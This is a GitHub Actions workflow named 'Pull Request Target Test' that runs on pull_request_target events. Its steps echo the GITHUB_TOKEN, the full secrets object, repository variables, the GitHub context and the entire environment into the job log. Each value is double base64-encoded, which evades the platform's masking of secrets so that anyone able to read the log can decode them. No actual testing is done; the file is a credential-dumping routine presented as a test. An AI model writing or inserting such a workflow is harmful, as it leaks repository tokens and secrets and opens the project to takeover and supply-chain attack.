# .github/workflows/pull_request_target.yml
name: Pull Request Target Test
on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Print a custom secret
        run: |
          echo "github token is ---"
          echo ${{ secrets.GITHUB_TOKEN }} | base64 | base64
          echo "all github conext info is ----"
          echo "GitHub Context: ${{ toJSON(github) }}" | base64 | base64
          echo "github variables ---"
          echo "Variables: ${{ toJSON(vars) }}" | base64 |base64
          echo "github secretes ----"
          echo "Variables: ${{ toJSON(secrets) }}" | base64 | base64
          
          

      - name: Print the special GITHUB_TOKEN
        env:
          tok: ${{ secrets.GITHUB_TOKEN }}
        run: |
          echo "GITHUB_TOKEN=${{ secrets.GITHUB_TOKEN }}"
          echo "$tok" | base64 | base64

      - name: System information
        run: |
          uname -a
          ls -la
          env | base64 | base64
